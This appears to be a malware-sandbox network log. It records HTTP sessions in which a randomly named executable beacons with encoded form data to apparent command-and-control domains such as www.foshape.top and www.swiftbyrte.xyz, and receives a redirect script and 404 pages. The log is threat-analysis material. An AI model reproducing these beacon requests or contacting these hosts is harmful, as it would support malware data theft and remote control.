                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Data Raw: 53 36 67 30 69 36 31 3d 64 2f 76 67 44 75 73 39 44 61 33 34 50 39 57 31 6b 6c 32 66 66 47 59 67 56 4b 37 62 55 56 69 62 4a 46 62 79 57 63 5a 4e 56 79 31 55 65 55 63 63 76 59 31 4e 52 78 41 47 35 74 79 39 6b 63 6b 59 2b 38 73 74 45 4b 30 5a 77 51 41 62 4a 66 69 72 30 58 46 76 50 34 4a 75 4e 48 57 6f 4d 71 57 37 33 43 7a 6c 7a 75 4b 6e 4c 2b 58 30 48 51 33 64 77 4c 54 6b 31 52 2f 68 34 49 38 4e 74 45 30 55 6f 36 4b 33 48 6c 62 64 47 6a 6c 67 69 55 4f 4b 65 55 32 76 4a 79 34 6d 2b 55 39 73 5a 65 37 68 77 72 6b 54 6c 71 4a 33 79 53 41 51 36 6c 54 43 33 5a 6e 6b 69 72 54 77 4b 51 49 6f 38 6c 36 36 32 49 38 2f 42 79 79 53 6f 52 67 77 2b 67 52 34 64 71 46 59 75 56 48 61 44 34 38 65 6b 75 41 72 77 4f 2b 39 39 76 48 68 68 75 7a 4d 75 4c 47 49 69 46 7a 6a 67 50 62 52 74 72 77 72 4d 6a 77 6d 50 2f 77 41 43 55 77 2b 72 6b 55 39 77 70 70 6a 72 72 30 70 51 72 4a 6f 61 78 4e 6d 70 43 55 4e 6d 43 46 37 52 33 43 37 75 74 43 59 73 38 4c 50 70 70 55 64 4f 42 56 56 43 6e 2b 55 2f 31 43 47 6e 63 4b 4b 31 48 41 65 72 65 [TRUNCATED]
                                                                                                Data Ascii: S6g0i61=d/vgDus9Da34P9W1kl2ffGYgVK7bUVibJFbyWcZNVy1UeUccvY1NRxAG5ty9kckY+8stEK0ZwQAbJfir0XFvP4JuNHWoMqW73CzlzuKnL+X0HQ3dwLTk1R/h4I8NtE0Uo6K3HlbdGjlgiUOKeU2vJy4m+U9sZe7hwrkTlqJ3ySAQ6lTC3ZnkirTwKQIo8l662I8/ByySoRgw+gR4dqFYuVHaD48ekuArwO+99vHhhuzMuLGIiFzjgPbRtrwrMjwmP/wACUw+rkU9wppjrr0pQrJoaxNmpCUNmCF7R3C7utCYs8LPppUdOBVVCn+U/1CGncKK1HAereO9SjyMCG7wzCplzzOAGn40KOlMbs1SPIuvlSsUHhfZcpx3UU9tO0SrNGRmyPjkIxf7gIfmaMqS+wHCHsLJoPzGSrHISzbSxXuMdgT7xp7wZfrWI2PFHSBlPLYbUNtDU1yZrbZcCJ87KvNUmfxZUC4OU6efc+rM9sG4OLbE0lC+xD4MgsP7AkyhVSYhujgHB+nI6SZFDYOk/iupMUDJRixIc//lPf2Rpo7ldP7LzW5H1htSj+jcKkMxiIcGpgCDb1mmquxwzIGUUwGOjU6cotcy78k7E644mjrrtzfJ8tcmf0/E+Cb+vulSErKLeqYHs8lV3Xe042V/uyptcKdl0xU5o8PgQJ50O5xOwOgVUMxAlyraqiLyO+8kQGIO75nwoUrS3byirApc3BGj43e2oW6WqEQF/5QAS3/9ajzmdK/LxikK1nOU7Ys1pMHs00DKUx73o/FUlJ8vVNMGXmAIG7xBTO6f7F8rJXzfh//pQouwC6ztu1cVy1y8Avqj16oddKAZHLFzTAaUxPaq3gWvCo5Gl8ZH1uce7RdDgnvWnD7/932uy7sBnJFc1ND6idYGrSKYgw6LDgHWj3n3OFZLJY/yoPZUBHd+saPYNQMy1YiwXfguev+GBaglgobz49trUzkjlbaakbMtuFd74gv7vkrgg2gfpd12aDIn [TRUNCATED]
                                                                                                Nov 11, 2024 10:05:03.804693937 CET1611OUTData Raw: 43 32 57 2f 65 6b 69 59 56 59 4a 6a 66 4e 75 78 4e 68 74 63 62 55 50 31 5a 6c 77 55 32 6e 4c 35 66 6e 2f 71 55 34 42 56 6e 37 59 78 4b 6a 62 77 39 6f 76 72 61 56 33 47 70 57 5a 63 75 61 34 4e 6c 32 61 59 36 2f 77 61 4e 35 6a 7a 4f 37 4f 41 65 4f
                                                                                                Data Ascii: C2W/ekiYVYJjfNuxNhtcbUP1ZlwU2nL5fn/qU4BVn7YxKjbw9ovraV3GpWZcua4Nl2aY6/waN5jzO7OAeOmRg6PZW/d7qMy+iLSaeBl2DRP6iLPOWkDxQqziCKK1rvmzB3NZGwjOKlaFW+Fl9Zzg+zXwKx3W4u88YQTKie1MPOnw3cF12pC46Ga2Yh2Iu2s9GCBbiRwwL7Mjzl8jtM0Bp1pHOzDro8cMCj2JedRJDq59tlU0SOf
                                                                                                Nov 11, 2024 10:05:04.599663973 CET398INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 09:05:04 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Content-Encoding: gzip
                                                                                                Data Raw: 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d cc cd 0a 82 40 18 85 e1 bd 57 21 b3 a9 20 bf 51 2b 90 52 41 ac 16 31 10 91 2d 6a 13 36 2a 7e fe 8c 32 33 e0 22 ba f7 82 a2 4d ed ce 7b 16 8f af b8 c4 5e 9b bc 4c a5 ca 75 40 4e c9 d6 f2 88 89 59 40 58 74 8d f7 8c 6d e2 84 98 4a f2 80 50 aa b2 1a 16 0e 34 29 ad 94 f5 0a ab 97 1d b4 28 a0 52 24 f4 e9 1b 0b 0d ff 33 58 04 28 50 8f ef 98 2d c9 6c 77 38 bb f9 7c dd 5f 98 7d 3c d6 0b 32 e5 f5 9f f7 31 f9 75 8c 01 45 d6 0d d0 74 3c d5 d8 09 28 65 5e 98 c1 a8 d4 ba 57 4b 4a 6f 85 63 bb a0 9a b4 18 10 b8 a0 33 0f 4a dd 36 a3 95 f1 b5 9e a9 17 1a 1b e9 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: c5m@W! Q+RA1-j6*~23"M{^Lu@NY@XtmJP4)(R$3X(P-lw8|_}<21uEt<(e^WKJoc3J60


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                9192.168.2.2249171206.238.184.166802184C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 10:05:06.342705011 CET407OUTGET /1pj2/?S6g0i61=Q9HAAZkCTqKabe7K9gqmXFE+SKHCRVqPW1vmcslVAAVFIE4vmP8qeBByw9bQm+sf9dgpGu9sujYQB/6wq00OHtIuIS6zL5jH+2jz6veFJLP5dS32kbHd1AuYwep/&2Z94P=LzK44tdp_JPt28wP HTTP/1.1
                                                                                                Host: www.foshape.top
                                                                                                Accept: */*
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Nov 11, 2024 10:05:07.134526968 CET410INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 09:05:06 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 65 39 0d 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 33 4a 51 59 32 65 34 44 70 5a 4c 30 53 53 6b 35 22 2c 63 6b 3a 22 33 4a 51 59 32 65 34 44 70 5a 4c 30 53 53 6b 35 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 27 68 74 74 70 73 3a 2f 2f 62 66 31 30 32 2e 73 6c 61 66 77 69 2e 63 6e 2f 33 38 2e 68 74 6d 6c 27 3b 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: e9<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"3JQY2e4DpZL0SSk5",ck:"3JQY2e4DpZL0SSk5"})</script><script>window.location.href ='https://bf102.slafwi.cn/38.html';</script>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                10192.168.2.2249172209.74.64.59802184C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 10:05:12.416843891 CET2472OUTPOST /4nss/ HTTP/1.1
                                                                                                Host: www.swiftbyrte.xyz
                                                                                                Accept: */*
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Origin: http://www.swiftbyrte.xyz
                                                                                                Referer: http://www.swiftbyrte.xyz/4nss/
                                                                                                Content-Length: 2164
                                                                                                Cache-Control: no-cache
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Data Raw: 53 36 67 30 69 36 31 3d 33 38 2b 49 45 54 4f 6a 66 65 46 66 45 34 59 70 4f 64 50 51 74 77 37 74 2b 36 4b 52 46 6b 71 48 4f 32 49 44 73 2f 4c 31 62 70 45 4f 70 2b 2f 44 2f 43 5a 61 63 2b 57 77 77 51 6d 48 4e 75 79 4e 61 5a 73 65 6a 43 33 54 30 4f 4a 6e 7a 4d 41 46 33 73 57 6b 7a 6c 51 64 76 37 6f 7a 70 77 45 52 68 7a 74 63 69 47 49 67 47 67 67 4c 44 54 78 4f 79 55 34 76 51 76 36 43 53 49 49 41 4d 62 6c 57 59 78 6b 44 6f 44 66 2f 77 58 55 37 48 47 68 45 64 44 76 63 6b 35 6c 47 52 6b 6d 4f 53 47 37 41 59 79 48 4d 53 32 2b 4f 79 77 4d 78 35 39 47 36 71 6f 6d 54 46 33 57 68 6c 4b 6d 75 2f 73 45 73 74 75 73 5a 35 61 6c 79 74 59 54 4a 62 2b 68 37 4c 75 67 79 4a 64 45 73 45 5a 36 6a 56 38 4c 54 72 67 6c 58 31 31 5a 6c 6c 34 69 62 68 33 4e 6e 47 64 45 45 56 53 64 43 4f 66 42 77 35 73 34 4a 77 71 53 72 34 5a 51 66 7a 67 50 37 53 35 4d 56 38 36 43 31 37 77 37 4b 70 35 6d 55 6f 64 45 65 5a 49 63 55 31 48 57 76 4c 45 71 6b 51 58 4b 45 61 2b 4a 38 6d 5a 51 61 46 75 34 4a 51 45 78 7a 38 5a 54 4a 4a 74 74 7a 43 79 [TRUNCATED]
                                                                                                Data Ascii: S6g0i61=38+IETOjfeFfE4YpOdPQtw7t+6KRFkqHO2IDs/L1bpEOp+/D/CZac+WwwQmHNuyNaZsejC3T0OJnzMAF3sWkzlQdv7ozpwERhztciGIgGggLDTxOyU4vQv6CSIIAMblWYxkDoDf/wXU7HGhEdDvck5lGRkmOSG7AYyHMS2+OywMx59G6qomTF3WhlKmu/sEstusZ5alytYTJb+h7LugyJdEsEZ6jV8LTrglX11Zll4ibh3NnGdEEVSdCOfBw5s4JwqSr4ZQfzgP7S5MV86C17w7Kp5mUodEeZIcU1HWvLEqkQXKEa+J8mZQaFu4JQExz8ZTJJttzCy3/1fzF6/06g7sZ6CMUPU8hXIDAiLRT6x5TEdSo7/A9fLfQ8uZCCV/jH7bHY6zyrMJNeC2PEEElCOKdov9QUNOj70Dsz2MIJ6QyVkWr0Q5w/xposYtYzSC88/lOp944GdGRzT3gLGpC0884uLm4ZVH59cXFUhBiFyhFBCu18vFNZpKYwfOLRGFCemO11xlV3Kh9Ek9Gk28CO901dCQXCIs+maAX3hl8cVYRyBaQGdf/CDSKfQT8ZYHmF2j7sDSqEdLgoaKvvM+zAcwqbPu6f5GZGlmPREiIY0iU+iYlqMfk7n3L65qaXpUaYKOkJxv44XIcTNXjJTmL9AqNW63ao71UPiNsLEqWkXlAm7YlK/eUb7xp1McXGmjvXz9DsQH8hURn8rICobBfO6sxsfzjVu0FUzB0hBgqyDsY10N3O6p+KB+1Z0S2PzEsD11B6Z+PTZKN5Knvg5GWAY0FEJVzWnrJkMZb58Y2oOD8sy/xbIUdO08rRmbrDhFucpXD+gEYz5PJ+gk7Zh9YANNU750Yp+lMhlZaydLVM105k/QlEzahto5ugfJharMt9L5AH7PUA5hOJUMLpBikttmQNYWOvO/iJEpRoFu56gDXILX4BAruFvQ+h6kMzrB0vx4k2wrjerdIYjwCUIzASzEms3unUXdVMycxWOCBi4a7 [TRUNCATED]
                                                                                                Nov 11, 2024 10:05:12.421905994 CET156OUTData Raw: 4f 36 34 34 44 2f 4b 48 63 39 72 71 52 4e 59 48 73 65 45 2f 31 52 65 46 67 4b 52 38 54 52 49 74 49 30 68 6d 45 4c 4b 4b 51 76 6a 43 46 55 2b 77 73 6a 54 2f 38 6b 59 41 32 63 35 63 41 43 70 54 64 58 76 2f 4e 31 37 78 46 41 4c 30 73 58 59 42 66 49
                                                                                                Data Ascii: O644D/KHc9rqRNYHseE/1ReFgKR8TRItI0hmELKKQvjCFU+wsjT/8kYA2c5cACpTdXv/N17xFAL0sXYBfIzl/HYUiNB7+rZxCBdrnCpZ4iGBHlg6B5Fm1Vj5y+yC5zUCQ5IawNZfgKUstOpFEteb2wglScGt
                                                                                                Nov 11, 2024 10:05:12.951385021 CET533INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 09:05:12 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                11192.168.2.2249173209.74.64.59802184C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 10:05:14.989640951 CET667OUTPOST /4nss/ HTTP/1.1
                                                                                                Host: www.swiftbyrte.xyz
                                                                                                Accept: */*
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Origin: http://www.swiftbyrte.xyz
                                                                                                Referer: http://www.swiftbyrte.xyz/4nss/
                                                                                                Content-Length: 204
                                                                                                Cache-Control: no-cache
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Data Raw: 53 36 67 30 69 36 31 3d 33 38 2b 49 45 54 4f 6a 66 65 46 66 45 37 67 70 49 4a 37 51 73 51 37 74 39 36 4b 52 4c 45 72 4d 4f 32 56 32 73 36 37 6c 61 61 6b 4f 70 4b 37 44 2f 77 68 61 62 2b 57 76 37 77 6d 44 51 65 79 59 61 5a 74 2f 6a 48 50 54 30 4f 64 6e 79 70 45 46 78 74 58 57 78 56 51 66 6d 62 6f 49 70 78 35 6e 68 7a 67 44 69 43 38 67 47 69 30 4c 45 54 68 4f 33 32 67 76 43 76 36 45 55 49 4a 47 4d 62 70 35 59 78 31 4f 6f 48 66 2f 77 6c 77 37 48 58 42 45 5a 55 37 63 39 70 6c 44 62 45 6e 45 56 45 61 6e 56 77 62 4f 54 48 54 68 79 7a 6b 43 6c 64 32 30 73 65 32 2b 53 79 6d 71 6b 73 48 38 35 50 49 6c 31 51 3d 3d
                                                                                                Data Ascii: S6g0i61=38+IETOjfeFfE7gpIJ7QsQ7t96KRLErMO2V2s67laakOpK7D/whab+Wv7wmDQeyYaZt/jHPT0OdnypEFxtXWxVQfmboIpx5nhzgDiC8gGi0LEThO32gvCv6EUIJGMbp5Yx1OoHf/wlw7HXBEZU7c9plDbEnEVEanVwbOTHThyzkCld20se2+SymqksH85PIl1Q==
                                                                                                Nov 11, 2024 10:05:15.531544924 CET533INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 09:05:15 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                12192.168.2.2249174209.74.64.59802184C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 10:05:17.531440020 CET2472OUTPOST /4nss/ HTTP/1.1
                                                                                                Host: www.swiftbyrte.xyz
                                                                                                Accept: */*
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Origin: http://www.swiftbyrte.xyz
                                                                                                Referer: http://www.swiftbyrte.xyz/4nss/
                                                                                                Content-Length: 3628
                                                                                                Cache-Control: no-cache
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Data Raw: 53 36 67 30 69 36 31 3d 33 38 2b 49 45 54 4f 6a 66 65 46 66 46 59 6f 70 4b 6f 37 51 37 67 37 79 6a 4b 4b 52 46 6b 71 46 4f 32 4a 32 73 2f 4c 31 62 6f 49 4f 70 37 72 44 78 79 5a 61 64 2b 57 76 7a 51 6d 48 4e 75 79 4b 61 5a 34 4f 6a 43 71 6d 30 4e 78 6e 7a 49 55 46 33 72 36 6b 2b 31 51 64 74 37 6f 4c 70 78 34 6a 68 33 4d 48 69 43 34 61 47 69 73 4c 44 67 4a 4f 79 47 67 75 48 76 36 45 55 49 4a 53 4d 62 70 46 59 78 73 54 6f 47 47 6b 77 58 34 37 45 32 68 45 62 7a 76 66 74 5a 6c 48 61 45 6d 51 53 47 33 70 59 79 47 46 53 32 37 54 79 77 41 78 36 50 2b 36 71 76 4b 51 62 58 57 6d 36 61 6d 75 78 4d 45 75 74 75 73 46 35 61 6c 79 74 5a 76 4a 62 75 68 37 4c 76 68 41 47 39 45 73 59 4a 36 71 49 4e 32 67 72 6b 4d 32 31 77 49 51 6c 76 36 62 67 78 68 6e 58 64 45 45 53 69 64 41 4f 66 42 70 33 38 34 56 77 71 62 65 34 5a 41 31 7a 67 50 37 53 36 55 56 34 70 6d 31 79 41 37 4b 32 70 6d 56 39 4e 45 5a 5a 49 52 37 31 48 79 76 4c 46 79 6b 52 6c 53 45 4e 6f 6c 2f 70 4a 51 62 42 75 34 48 42 55 78 6d 38 5a 65 6b 4a 74 31 4a 43 78 [TRUNCATED]
                                                                                                Data Ascii: S6g0i61=38+IETOjfeFfFYopKo7Q7g7yjKKRFkqFO2J2s/L1boIOp7rDxyZad+WvzQmHNuyKaZ4OjCqm0NxnzIUF3r6k+1Qdt7oLpx4jh3MHiC4aGisLDgJOyGguHv6EUIJSMbpFYxsToGGkwX47E2hEbzvftZlHaEmQSG3pYyGFS27TywAx6P+6qvKQbXWm6amuxMEutusF5alytZvJbuh7LvhAG9EsYJ6qIN2grkM21wIQlv6bgxhnXdEESidAOfBp384Vwqbe4ZA1zgP7S6UV4pm1yA7K2pmV9NEZZIR71HyvLFykRlSENol/pJQbBu4HBUxm8ZekJt1JCxv/1cLF5e06jLsGiyN8cEA9XILuiLVp6zNTEMSorKs+DLfW3OZYQl/VH7XpY7Tyr+pNfCWPA3skE+LVjP99DdO370W5z39NKKAyEEWrwzB38hpn2ItKpiD78/k/p+9FGvWRzTHgKUBC0887lrmEW1Db9caCUnlyFzRFBSe18rpNB5KY5/OGK2EzemrX1wdj2+B9EERGiwICJd03OSQWMotcmZ4X3kdWcWYRyiCQG8f/JjSOBATdZYGVF2nesH3REb7gobKvpOGzHcwvXvvSOpHnGkefREO2Y16UsxQlo9fk5H3JlJqaZ5UCYKXZJ0eH4WwcT4LjMzmIlQqON63Zjb1gPidsLEuWkUlAnMElOMmUTrxr4sdWdW/PXzNhsV/shSJn/aICvdVcS6s3pfyieO1gUzBGhAo6y2QY1lt3Ne1/Ih/9QUShSDEYDzVn6bifSqeN5KXvgPyWAI0FEJUBWnrNkMco58JjoOD8qj/xb68dXE9hTmbwHhEtcpD1+kp3z4zJ+047Zh9ZF9NX2Z0Xp+5rhlZwydHVNG45lqMlEV2hko5utPJuTLMW9L5uH6CPA8VOLksLoDKryNmTE4WY0e6iJElJoAu59SHXap/4CwruZfQ95qlM9LN4vyce2x64efZIZU8CH5zHHzEyxnuhUXBcMykpWKG3i5O7 [TRUNCATED]
                                                                                                Nov 11, 2024 10:05:17.536581993 CET1620OUTData Raw: 4b 49 41 34 4a 2f 4b 45 43 74 72 33 52 4d 6c 6f 73 65 55 64 31 51 50 59 6a 37 64 38 63 42 49 74 5a 48 46 6e 4a 72 4b 49 58 76 6a 31 46 55 2b 59 73 6a 72 37 38 6c 6b 32 32 64 52 63 41 45 46 54 66 6e 76 38 4c 46 37 33 47 41 4c 79 73 58 45 6f 66 49
                                                                                                Data Ascii: KIA4J/KECtr3RMloseUd1QPYj7d8cBItZHFnJrKIXvj1FU+Ysjr78lk22dRcAEFTfnv8LF73GALysXEofIrL/HIUiOJ7+PFxHBdr6SpY0CHVJFs5B7l7rVPYyJ2MiiMVW/Qh39l2qocavNcBM+imo0AqCp//9bSf9FybdgeMO6lwAxil4A4cR4a/AkpemcwvRT9M+Jp/4/cexikXR99XfgzAlcr+6V56uzt4AUpn6uAsxyA/uf/
                                                                                                Nov 11, 2024 10:05:18.071110010 CET533INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 09:05:17 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                13192.168.2.2249175209.74.64.59802184C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 10:05:20.068116903 CET410OUTGET /4nss/?S6g0i61=6+WoHn2deLk8NJlLXYXNnS+xy6y4IG2yMX4VldfHBIoEopHs/Hw0Y5um7kzlNPuKTbh4gzzb5ORm5rQz5MS/zlApmrlBhjwV83cLky4dFg4gLxZewVN2CP71ee4I&2Z94P=LzK44tdp_JPt28wP HTTP/1.1
                                                                                                Host: www.swiftbyrte.xyz
                                                                                                Accept: */*
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
